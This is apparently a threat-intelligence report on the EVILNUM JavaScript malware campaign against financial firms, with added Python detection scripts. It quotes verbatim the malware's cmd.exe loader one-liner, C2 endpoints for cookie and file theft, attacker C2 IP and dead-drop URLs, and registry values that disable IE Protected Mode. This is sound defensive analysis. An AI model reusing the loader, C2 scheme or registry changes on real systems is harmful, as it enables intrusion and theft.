Wednesday, May 6, 2020

Phantom in the Command Shell

Author: Danny Adamitis 

Executive Summary

Prevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with the EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in the [Command] Shell”.

In these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well-known, widely-used cloud provider. The attacker is counting on email filters being unlikely to block that domain, and on the provider trusting its own links enough that the file is unlikely to be scanned. Once engaged, the victim's device downloads a compressed folder that contains trojanized files. This is a user-initiated infection, meant to appear as a typical business interaction, in this case part of "Know Your Customer" (KYC) banking procedures. The trojanized files use images of credit cards, driver's licenses, passports, and utility bills as lures. When the files are opened, the decoy images are displayed to the user while an agent written in JavaScript is surreptitiously invoked without any visible window. Code comments in the agent indicate that the two latest iterations are versions 3.6 and 4.0, respectively. Both are designed for Windows.

The first version of EVILNUM was identified in 2018; the second version was discovered a year later during an unrelated incident response investigation, having infiltrated a FinTech company. That initial reporting was the only public sign of its presence, and the malware then briefly faded from view.

EVILNUM has surfaced again in the financial sector with a new variant that has evolved into a very effective tool for evading both standard network- and host-based detection. It carries supplementary logic that adapts to the local system and alters its actions - and even its choice of C2 - based on the antivirus products detected on the host. The agent allows the threat actor to upload files, download files, run commands, steal cookies and access other protected data. It persists through reboot by adding a registry key, and it removes artifacts of its presence from the host. Given the versatility added to this variant, we suspect it is capable of loading auxiliary payloads onto a host.

Technical Details

Introduction

Prevailion has discovered an updated variant of the deceptive EVILNUM agent. It was delivered to victims via a URL on a cloud platform hosting a zip file. If the link is clicked, the victim downloads a compressed folder riddled with trojanized files that masquerade as PDFs and JPEGs. These files present seemingly innocuous decoys to the end user while quietly running in the background. The first version of EVILNUM was observed and reported in 2018. The second version was reported by Palo Alto Networks, targeting a specific financial technology (FinTech) organization. This report covers the latest versions, 3.6 and 4.0: how they are delivered, their evasion techniques, and their communication channels.

Infection Vector

The infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based platform, in this case Google Drive. This technique is increasingly used to avoid intrusion detection system (IDS) rules by hosting the malicious file on a third-party platform that is likely allow-listed. When the link is clicked and traffic to Google Drive is initiated, the download of a compressed folder from that location begins.
Phantom in the command shell campaign walk through

Microsoft Link Lures

Prevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest that more zip folders exist. Once decompressed, each folder is found to contain Microsoft shortcut (LNK) files named to impersonate JPEG or PDF files. We have categorized these LNK files into two subcategories. The first set of lures uses basic Know Your Customer (KYC) elements as a ruse; these are the documents anyone would be asked for when opening a new account with a financial services organization, for example a driver's license, credit cards, credit history documents, and proof-of-address paperwork. The second subcluster includes a document that appears to impersonate an established financial services organization and references its 2020 GDPR compliance plan. Given the nature of these lures, Prevailion suspects with moderate confidence that these efforts were targeted at select financial institutions rather than being wide-scale spam.

Once decompressed, the first zip folder contained the following KYC files:
      Driv License front.jpg.lnk
      Driv License back.jpg.lnk
      Credit Card Front.jpg.lnk
      Credit Card Back.jpg.lnk
      Utility Bill.jpg.lnk

The name on the driver's license corresponds to a real person, who happens to be the CEO of a bank located in a British territory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the first, containing various KYC documents, and impersonated a Canadian person who we suspect works for a different financial organization. The last KYC client file we identified was for a Finnish national who we suspect works for a managed cloud services provider. Prevailion was unable to confirm whether these documents were authentic; if forged, they closely resemble the genuine article.

The second subcategory contains a file name that references an organization rather than an individual. The document impersonates an investment company located in England. Like the previously mentioned LNK files, when clicked by the user it launches a script that runs in the background.

As mentioned, there is added functionality built into this particular agent; one element is the display of a decoy file that corresponds to the selected file name. We analysed the properties of the LNK files themselves with an LNK parser to search for clues left behind by the actor. However, all the LNK files carried the same forged metadata: they were timestomped with a creation date of September 5th, 2018, and the link tracker data points to a VMware virtual machine (based on the 00:50:56 MAC address prefix) with the NetBIOS name "admin-pc", suggesting the actor went to some lengths to obfuscate the metadata related to their activities. The LNK file properties can be found below.

[Distributed Link Tracker Properties]
Version:                         0
NetBIOS name:                    admin-pc
Droid volume identifier:         a82e4430-d4a8-417a-b678-88e886bec590
Droid file identifier:           8cb9d0c4-b0f4-11e8-b065-005056c00008
Birth droid volume identifier:   a82e4430-d4a8-417a-b678-88e886bec590
Birth droid file identifier:     8cb9d0c4-b0f4-11e8-b065-005056c00008
MAC address:                     00:50:56:c0:00:08
UUID timestamp:                  09/05/2018 (10:15:01.429) [UTC]
UUID sequence number:            12389
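The MAC address, timestamp and sequence number in that table are not stored separately in the LNK file; they are all unpacked from the droid file identifier, which is an RFC 4122 version-1 UUID. The following script is an added example written for this article (it is not Prevailion's tooling or the actor's code) that performs the same unpacking with Python's standard library. The KNOWN_OUIS table is a two-entry lookup constructed for the example; everything else is the UUID v1 layout.

```python
"""Decode the Distributed Link Tracker ("droid") identifiers carried in an LNK file.

Added example for this article, not code from the original post or from the actor.
A version-1 UUID embeds a 60-bit creation timestamp, a 14-bit clock sequence and
the 48-bit node (MAC address) of the host that generated it, which is why an LNK
parser can report a creation time and a MAC for a shortcut.
"""
import uuid
from datetime import datetime, timedelta, timezone

# Ticks (100 ns) between the UUID epoch (1582-10-15) and the Unix epoch (1970-01-01).
UUID_TO_UNIX_100NS = 0x01B21DD213814000

# Minimal OUI lookup, constructed for this example; both prefixes are VMware's.
KNOWN_OUIS = {"00:50:56": "VMware", "00:0c:29": "VMware"}


def decode_droid(droid: str) -> dict:
    """Return the timestamp, clock sequence and MAC embedded in a v1 UUID string."""
    u = uuid.UUID(droid)
    if u.version != 1:
        raise ValueError(f"{droid} is not a version-1 UUID; no timestamp/MAC to recover")
    unix_100ns = u.time - UUID_TO_UNIX_100NS
    created = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(
        microseconds=unix_100ns // 10
    )
    node = f"{u.node:012x}"
    mac = ":".join(node[i:i + 2] for i in range(0, 12, 2))
    return {
        "timestamp_utc": created.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3],
        "clock_seq": u.clock_seq,
        "mac": mac,
        "vendor": KNOWN_OUIS.get(mac[:8], "unknown"),
        # Bit 1 of the first octet set means a locally administered (randomised)
        # address, which would make the MAC useless for attribution.
        "locally_administered": bool(int(node[:2], 16) & 0x02),
    }


def same_creator(droid_a: str, droid_b: str) -> bool:
    """True when two droid file identifiers share node and clock sequence, i.e.
    were generated on the same host by the same UUID generator state. This is the
    check that shows every lure in a zip was produced on one machine."""
    a, b = uuid.UUID(droid_a), uuid.UUID(droid_b)
    return a.node == b.node and a.clock_seq == b.clock_seq


def moved_since_creation(volume_id: str, birth_volume_id: str,
                         file_id: str, birth_file_id: str) -> bool:
    """The birth identifiers are fixed when the link is created; the current pair
    is rewritten when the file lands on another volume. Equal pairs mean the
    shortcut never left the volume it was created on."""
    return (volume_id, file_id) != (birth_volume_id, birth_file_id)


if __name__ == "__main__":
    info = decode_droid("8cb9d0c4-b0f4-11e8-b065-005056c00008")
    for key, value in info.items():
        print(f"{key:>20}: {value}")
```

Running it against the droid file identifier from the table above reproduces the parser's output: 2018-09-05 10:15:01.429 UTC, sequence number 12389 and MAC 00:50:56:c0:00:08 with a VMware OUI. Because the node and clock sequence only change when the generating machine (or its UUID state) changes, identical values across every lure are what justify the "one machine, one session" conclusion.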

Loader Functionality

Opening any one of the files, such as "Credit Card Front," executes a protracted command line. It first sets PATH to C:\Windows\system32 so that the utilities it relies on resolve regardless of the user's environment. The first operation then moves the clicked file to the Temp folder and renames it "1.lnk". It next uses forfiles to search the Temp directory recursively for any .lnk files whose names start with "Cred" and that were modified that day, moving each of them to 1.lnk as well. It then reads 1.lnk with type and pipes it through find, which keeps only the lines containing the marker "TRU4"; that output is redirected into a new file named 0.js. The trailing "rd a" is a deliberate failure (there is no directory named "a"), so the "||" that follows always falls through to cscript, which executes 0.js. The command is as follows:

"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"
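The "type | find" trick means the shortcut's own bytes carry the script: every payload line is tagged with the marker, and find discards the binary shortcut header and anything else without it. The script below is an added example for this article (not the author's tooling or the actor's code) that carves the embedded script from an LNK the same way, and flags the loader's command-line shape from a process-creation log. LNK_SAMPLE is constructed for the example (a ShellLink header, some filler, and tagged lines holding harmless JavaScript); only the "TRU4" marker and SAMPLE_LOADER_CMDLINE come from the analysed lure.

```python
"""Carve the marker-tagged script from a lure LNK the way 'type 1.lnk | find "TRU4"'
does, and detect that loader chain in a command line.

Added example for this article, not code from the original post or from the actor.
cmd's FIND prints every line (split on LF) that contains its search string, so the
actor only has to tag each payload line with a marker to have FIND strip the binary
shortcut structure and any decoy bytes.
"""
import re

# ShellLinkHeader: HeaderSize (0x4C) followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its little-endian on-disk layout.
SHELL_LINK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Constructed sample: header, filler, a decoy target line, JPEG-looking junk,
# three tagged payload lines (harmless JScript) and an untagged trailer.
LNK_SAMPLE = (
    SHELL_LINK_MAGIC
    + b"\x9b\x00\x08\x00" + b"\x00" * 60
    + b"C:\\Windows\\System32\\cmd.exe /c ...\r\n"
    + b"\xff\xd8\xff\xe0JFIF\x00" + b"\x01\x02" * 8 + b"\r\n"
    + b'/*TRU4*/ var c2 = "http://203.0.113.10";\r\n'
    + b'/*TRU4*/ var ver = "4.0";\r\n'
    + b"/*TRU4*/ WScript.Echo(c2 + ' ' + ver);\r\n"
    + b"\x00\x00trailing bytes without the marker\r\n"
)

# Verbatim command line from the lure analysed above (page content, not constructed).
SAMPLE_LOADER_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card front.jpg.lnk " '
    r'"C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" '
    r'/M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path '
    r'C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"'
    r'|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT '
    r'"C:\Users\admin\AppData\Local\Temp\0.js"'
)


def is_shell_link(blob: bytes) -> bool:
    """True when the blob starts with a ShellLink header (what a .lnk should be)."""
    return blob.startswith(SHELL_LINK_MAGIC)


def carve_marked_lines(blob: bytes, marker: bytes = b"TRU4"):
    """Every line containing marker, in file order, CR stripped (FIND's output)."""
    return [line.rstrip(b"\r") for line in blob.split(b"\n") if marker in line]


def carve_script(blob: bytes, marker: bytes = b"TRU4") -> str:
    """Reassemble the carved lines into the text cscript would run (the 0.js)."""
    return b"\r\n".join(carve_marked_lines(blob, marker)).decode("latin-1")


# 'type <x>.lnk | find "<marker>" > <y>.js' followed by cscript is specific enough
# to alert on from process-creation telemetry (Sysmon event 1 / Security 4688).
LOADER_RE = re.compile(
    r'type\s+"?[^|"]*\.lnk"?\s*\|\s*find\s+"[^"]+"\s*>\s*"?[^"&|]*\.js"?',
    re.IGNORECASE,
)


def looks_like_lnk_loader(cmdline: str) -> bool:
    return bool(LOADER_RE.search(cmdline)) and "cscript" in cmdline.lower()


if __name__ == "__main__":
    print(is_shell_link(LNK_SAMPLE))
    print(carve_script(LNK_SAMPLE))
    print(looks_like_lnk_loader(SAMPLE_LOADER_CMDLINE))
```

Carving with the marker rather than by offset is the right approach for triage here because the actor, not the LNK format, decides where the script lives; any marker observed in a new lure's command line can be passed in place of "TRU4". The detection regex deliberately keys on the whole chain (an .lnk piped through find into a .js, then cscript) rather than on any one utility, all of which are legitimate on their own.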

Core Agent

This file, 0.js, is the main agent deployed to the victim's machine. It is written in JavaScript, run headlessly through cscript (hence "Phantom"), and this particular script was designed for Windows. One comment in the code indicates that this iteration is version 3.6. One of our favorite elements is its use of a one-way communication method (a dead drop) to obtain the C2 address, which helps it remain elusive. The agent also includes a function aptly named "DeleteLeftovers" that removes certain artifacts of the attack.

Once initiated, the agent enumerates the infected machine using Windows Management Instrumentation (WMI) to obtain the following information:
      Computer name
      Username
      Antivirus products

This agent has traditional trojan functionality that allows it to perform the following tasks:
      Upload files
      Download files
      Harvest cookies
      Get files from the C2
      Run arbitrary commands
      Run Windows Script Component (.sct) files
      Call a Python 2.7 interpreter through rundll32
      Log any errors that the agent generates

One difference between this variant and previous iterations is the removal of the screenshot functionality. The agent does retain some original functions, such as bringing files down from the C2 and converting strings of data into bytes in order to receive binary data. This suggests the agent can retrieve subsequent payloads, indicating it is likely just a first-stage agent.

Retrieval of C2 Address

One of the first things the agent does is ping Google to check for an internet connection. If the host is connected, the agent kills any Internet Explorer instances whose command line contains "-Embedding" (the switch Windows passes when IE is launched as a COM automation server). It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication channel; that web page contains a string identifying the corresponding C2 node.

Like the previous variants of EVILNUM, the actor set up accounts on GitLab and on Digital Point, a web forum. The four primary URLs used as dead-drop sites for this one-way communication were:
      hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md
      hxxps://www.digitalpoint[.]com/members/johndeer123.923670/
      hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md
      hxxps://www.digitalpoint[.]com/members/bliblobla.943007/

The actor likely set up two web pages per campaign for redundancy. The agent periodically checks those two web pages every 180000 seconds (50 hours).
Metadata properties of the most recent campaign show that the “bliblobla123” Gitlab account was created on May 3rd, 2020.
Image showing the date when the Gitlab account was created
Image showing the latest C2 embedded in the README.MD file

The "johndeer123" Digital Point account associated with version 3.6 was created on February 21, 2019. One difference between the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string "8346758545". On the Digital Point web forum, the observed C2, hxxp://185.62.190[.]89, was stored as a value in the profile's "interest" field.
Image of Johndeer123 Digital Point Profile

If the host is running BitDefender, EVILNUM instead reaches out to a different URL, hxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py, and searches for the same string "8346758545". There is also fallback functionality to use "long2ip", the arithmetic-based method implemented in the previous agent: it takes the retrieved number, divides it by 8, and converts the result to a dotted-quad IP address.

Command and Control Communications

Once the agent obtains the IP address it sends a GET request to check.php. If the IP address is indeed the correct C2, the server returns a message padded with "jifhruhajsdfg444" on each side. In this case it received a padded "success" message:

Wireshark stream of a check interaction from the victim to the C2

Once the agent confirms the correct IP address, it sends a register request. This POST carries the host enumeration information. The C2 responds with the agent's unique identifier, which is then saved at:
appDataPath + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\id.txt

Image of the register function with version 3.6 on the left and 4.0 on the right

Based upon code analysis the following HTTP requests and parameters were identified:
      "check.php?id=" + id + "&ver=" + ver
      Agent confirms it has the right IP address and sends its version number
      "register.php?av=" + av + "&cpu-name=" + cpuName + "&ref=" + REFNAME + "&user=" + userName
      Registers the agent with the C2 and obtains a unique identifier
      "view.php", "id=" + id
      Gets commands from the C2
      "cookies.php?id=" + id
      Uploads harvested cookies to the C2
      "DOWNLOAD_FILE.php".toLowerCase(), "FILE-URL=".toLowerCase() + fileURL
      Downloads a file from the C2 and places it in the tmp and appData folders
      "send.php?id=" + id, filePath, "uploaded_file"
      Uploads a file from the infected host to the C2
      "upload.php?id=" + id, sctFile, "uploaded_file"
      Obtains a Windows Script Component from the C2, then stores it as "878478ddd3.TMP"
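Both the C2 retrieval described under "Retrieval of C2 Address" and the endpoint table above leave a recognisable shape in web-proxy logs: a GitLab raw README or a Digital Point profile page fetched by a host, followed by check.php and register.php requests with exactly this parameter set against a bare IP. The script below is an added example for this article (not Prevailion's tooling or the actor's code) that matches those shapes and strips the check.php padding. The endpoint names, query parameters, padding string and dead-drop URL patterns come from the analysis above; the log format (timestamp, client, method, URL, status) and every line in SAMPLE_LOG are constructed for the example.

```python
"""Match EVILNUM dead-drop fetches and C2 endpoints in web-proxy logs.

Added example for this article, not code from the original post or from the actor.
Log format and SAMPLE_LOG lines are constructed; endpoint names, parameter sets,
the padding string and the dead-drop URL shapes are taken from the analysis.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

PAD = "jifhruhajsdfg444"

# path -> query parameters the agent always sends with it. Endpoints whose
# parameters travel in the POST body (view.php, download_file.php) can only be
# matched on path here, so they are reported as "c2-weak" and need corroboration.
C2_ENDPOINTS = {
    "check.php": {"id", "ver"},
    "register.php": {"av", "cpu-name", "ref", "user"},
    "cookies.php": {"id"},
    "send.php": {"id"},
    "upload.php": {"id"},
    "view.php": set(),
    "download_file.php": set(),
}

DEAD_DROPS = [
    ("gitlab-raw-readme",
     re.compile(r"^https?://gitlab\.com/[^/]+/[^/]+/(?:-/)?raw/[^/]+/README\.md$", re.I)),
    ("gitlab-raw-testpy",
     re.compile(r"^https?://gitlab\.com/[^/]+/[^/]+/(?:-/)?raw/[^/]+/test\.py$", re.I)),
    ("digitalpoint-profile",
     re.compile(r"^https?://www\.digitalpoint\.com/members/[^/]+\.\d+/?$", re.I)),
]

# Constructed sample log; the C2 IP and dead-drop URLs are the IOCs from this report.
SAMPLE_LOG = """\
2020-05-04T09:58:11Z 10.20.0.15 GET https://gitlab.com/bliblobla123/testingtesting/-/raw/master/README.md 200
2020-05-04T09:58:12Z 10.20.0.15 GET https://www.digitalpoint.com/members/bliblobla.943007/ 200
2020-05-04T09:58:20Z 10.20.0.15 GET http://185.62.190.89/check.php?id=&ver=4.0 200
2020-05-04T09:58:21Z 10.20.0.15 POST http://185.62.190.89/register.php?av=Avast&cpu-name=Intel&ref=KYC&user=admin 200
2020-05-04T09:59:00Z 10.20.0.15 POST http://185.62.190.89/view.php 200
2020-05-04T10:00:03Z 10.20.0.31 GET https://shop.example.net/check.php?id=42 200
2020-05-04T10:00:09Z 10.20.0.31 GET https://gitlab.com/someproject/tool/-/blob/master/README.md 200
""".splitlines()


def classify_url(url: str) -> Optional[str]:
    """'deaddrop:<kind>', 'c2:<endpoint>', 'c2-weak:<endpoint>' or None."""
    for label, rx in DEAD_DROPS:
        if rx.match(url):
            return f"deaddrop:{label}"
    parts = urlsplit(url)
    name = parts.path.rsplit("/", 1)[-1].lower()
    if name not in C2_ENDPOINTS:
        return None
    required = C2_ENDPOINTS[name]
    if not required:
        return f"c2-weak:{name}"
    # keep_blank_values: the first check.php is sent before an id exists ("id=").
    present = set(parse_qs(parts.query, keep_blank_values=True))
    return f"c2:{name}" if required <= present else None


def unpad_check_response(body: str) -> Optional[str]:
    """Strip the padding the C2 wraps around check.php replies; None if absent."""
    if len(body) >= 2 * len(PAD) and body.startswith(PAD) and body.endswith(PAD):
        return body[len(PAD):-len(PAD)]
    return None


def scan_log(lines):
    """Return (timestamp, client, label, url) for every suspicious request."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, _method, url, _status = fields[:5]
        label = classify_url(url)
        if label:
            hits.append((ts, client, label, url))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
    print(unpad_check_response(PAD + "success" + PAD))
```

The parameter-set requirement is what keeps this usable: "check.php?id=42" on a shopping site is not flagged because "ver" is absent, whereas a bare-IP request that carries exactly id and ver is. Sequencing matters too; a dead-drop fetch from one client followed within a minute or two by c2:check.php from the same client is far stronger than either hit alone.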

Persistence

As we described, the agent persists through a reboot by adding a registry key. This is the same technique used in version 2.0. One notable feature is that the actor added logic to change the registry key location based on the antivirus product detected during the enumeration phase. The previous version only special-cased BitDefender; the new version adds handling for Avast. If either of those two antivirus products is detected, it creates a registry key under:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\.
If no antivirus product is detected, or a product other than BitDefender and Avast, it creates a registry key under:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows.

Both keys will then run a shortcut file specified at the path:
"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\Media.lnk".

This shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence modifications are stored in a file named media.reg.

The second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM, and these modifications have remained consistent through the newest iterations. They are intended to weaken the security of the host. For example, one modification suppresses Internet Explorer's banner warning that Protected Mode is turned off (NoProtectedModeBanner), potentially lulling victims into a false sense of security, and the "2500" value under Zones\3 is the Internet-zone Protected Mode setting, which the value 3 turns off. Another removes CCleaner's browser monitoring, the feature that clears data downloaded by browsers, likely to ensure that downloaded scripts or tools are not removed. The registry keys and modified values are listed below.
      HKEY_CURRENT_USER\Control Panel\Cursors
      "AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,0
      This is a REG_EXPAND_SZ value in UTF-16LE; it decodes to "%SystemRoot%\cursors\aero_arrow.cur"
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
      "Check_Associations"=no
      "NoProtectedModeBanner"=dword:00000001
      "IE10RunOncePerInstallCompleted"=dword:00000001
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery
      "AutoRecover"=dword:00000002
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
      "EnabledV9"=dword:00000001
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
      "MSCompatibilityMode"=dword:00000001
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
      "EnableBalloonTips"=dword:00000000
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
      "GlobalUserOffline"=dword:00000000
      HKEY_CURRENT_USER\Software\Piriform\CCleaner
      "BrowserMonitoring"=-"(Mon)3001\"
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
      "2500"=dword:00000003
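A .reg file like mediaIE.reg is small enough to audit by hand once, but the same values keep reappearing across EVILNUM versions, so it is worth having a parser that decodes the hex(2) string and flags the weakening values automatically. The script below is an added example for this article (not Prevailion's tooling or the actor's file). REG_SAMPLE is constructed from the keys listed above, written in standard .reg syntax: the hex(2) value is completed with the two terminating NUL bytes that the copy above truncates, and the CCleaner value uses the standard "=-" delete form.

```python
"""Parse a .reg script and flag the values that weaken IE / host hygiene.

Added example for this article, not code from the original post or from the actor.
REG_SAMPLE is constructed from the mediaIE.reg keys listed in the report.
"""
import re

REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Cursors]
"AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,\
  72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Check_Associations"="no"
"NoProtectedModeBanner"=dword:00000001
"IE10RunOncePerInstallCompleted"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery]
"AutoRecover"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=dword:00000000

[HKEY_CURRENT_USER\Software\Piriform\CCleaner]
"BrowserMonitoring"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2500"=dword:00000003
"""

# (key suffix, value name, expected data or None for "value deleted", why it matters)
WEAKENING = [
    (r"Internet Explorer\Main", "NoProtectedModeBanner", 1,
     "hides the IE warning bar that says Protected Mode is turned off"),
    (r"Internet Settings\Zones\3", "2500", 3,
     "turns Protected Mode off for the Internet zone (2500 = Protected Mode, 3 = disabled)"),
    (r"Explorer\Advanced", "EnableBalloonTips", 0,
     "suppresses notification balloons, so background activity draws no attention"),
    (r"Piriform\CCleaner", "BrowserMonitoring", None,
     "deletes CCleaner browser monitoring, so downloaded tooling is not cleaned up"),
]


def decode_hex2(value: str) -> str:
    """hex(2) is REG_EXPAND_SZ: comma-separated bytes, UTF-16LE, NUL-terminated."""
    raw = bytes(int(b, 16) for b in value.split(",") if b.strip())
    return raw.decode("utf-16-le").rstrip("\x00")


def _logical_lines(text: str):
    """Join the backslash-continued lines regedit allows for long hex values."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""
    if buf:
        yield buf


def parse_reg(text: str):
    """Return [(key, name, data, kind)]; kind is sz, expand_sz, dword, delete or raw."""
    entries, key = [], None
    for line in _logical_lines(text):
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m or key is None:
            continue
        name, rhs = m.group(1), m.group(2)
        if rhs == "-":
            entries.append((key, name, None, "delete"))
        elif rhs.startswith("dword:"):
            entries.append((key, name, int(rhs[6:], 16), "dword"))
        elif rhs.startswith("hex(2):"):
            entries.append((key, name, decode_hex2(rhs[7:]), "expand_sz"))
        elif len(rhs) >= 2 and rhs[0] == rhs[-1] == '"':
            entries.append((key, name, rhs[1:-1], "sz"))
        else:
            entries.append((key, name, rhs, "raw"))
    return entries


def audit(entries):
    """Return (key, name, reason) for each entry matching a WEAKENING rule."""
    findings = []
    for key, name, data, kind in entries:
        for suffix, vname, expected, why in WEAKENING:
            if key.lower().endswith(suffix.lower()) and name.lower() == vname.lower():
                if (expected is None and kind == "delete") or (expected is not None and data == expected):
                    findings.append((key, name, why))
    return findings


if __name__ == "__main__":
    for key, name, why in audit(parse_reg(REG_SAMPLE)):
        print(f"{key}\\{name}: {why}")
```

Running it on the sample produces four findings; the other values (the first-run and recovery settings, GlobalUserOffline, the compatibility flag) are exactly what is needed to drive Internet Explorer silently through COM without prompts, which fits the agent's use of IE for dead-drop retrieval, but none of them is a security downgrade on its own, so the rule table leaves them out.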

Conclusion

The Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are constantly advancing their techniques as they continue to focus their efforts on the global banking and financial system. The differences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.

This group has been targeting the financial sector since 2018 and has succeeded thanks to innovative methods for staying ahead of defensive measures, such as the use of JavaScript-based agents instead of the more commonly used executable files. They have continued to evolve this agent by changing the location of certain files to avoid detection by specific antivirus products and by changing communication patterns when certain products are present. They built an elaborate command and control retrieval tactic that uses well-known platforms as dead drops in order to bypass detection, and they configured the agent to use different C2 nodes depending on the security products found on the host.

One possible way to protect against this threat is to block or disable Microsoft shortcut (LNK) files on high-risk machines that routinely interact with untrusted parties. These high-risk machines should also be segmented within the network to impede an attacker's ability to move laterally if they are compromised. We recommend routinely monitoring network logs for abnormal connections to IP addresses associated with virtual private servers.

Prevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise

GDrive URLs
hxxps://drive[.]google[.]com/uc?auth_user=0&id=1KjJy7FCn-4IN7rsOSwWmSab3xVfY-wNn&export=download
hxxps://docs[.]google[.]com/uc?authuser=0&id=1TROQjDFvR1pw7QckQq1TUVnOYUK6tR6Q&export=download

Zip Files
0f4b51dafe6bd75bce2cfbd1fe16d1af91fd958084e23b526671b4e05423f9ee
97aa67531305da6fb73198fabd05b0592705c427519670a218d68d9def83f764
83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c

Microsoft ShortCut (Lnk) Files
9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5
b89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e
951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b
7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6
4930874f700dd81bff1c0f2ec7a8f55741987e102be8164bdc4aad6ea97062cb
1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284
88537039a4b87ff55ef9a57c21f728ecf90e40e532486913d763e16db04ccac4
01f1f23649920e30d510f6ae48e370c82dd57ce0817d12f649615d7188c9b0e2
ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30
ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea
83e5eeb549543e16f98eb26d848194baa8273d5e0408c72222999535f91434fe
4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade
bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7
7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e
69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4
e06ab6b87c4977c4ee30f3925dd935764a0ec0da11458aca4308da61b8027d76
79ddc62bcab8efaef586c7e4202fa6a40a82a37571cbab309812602f7a03162b

Core Agent
Javascript agent version 4.0
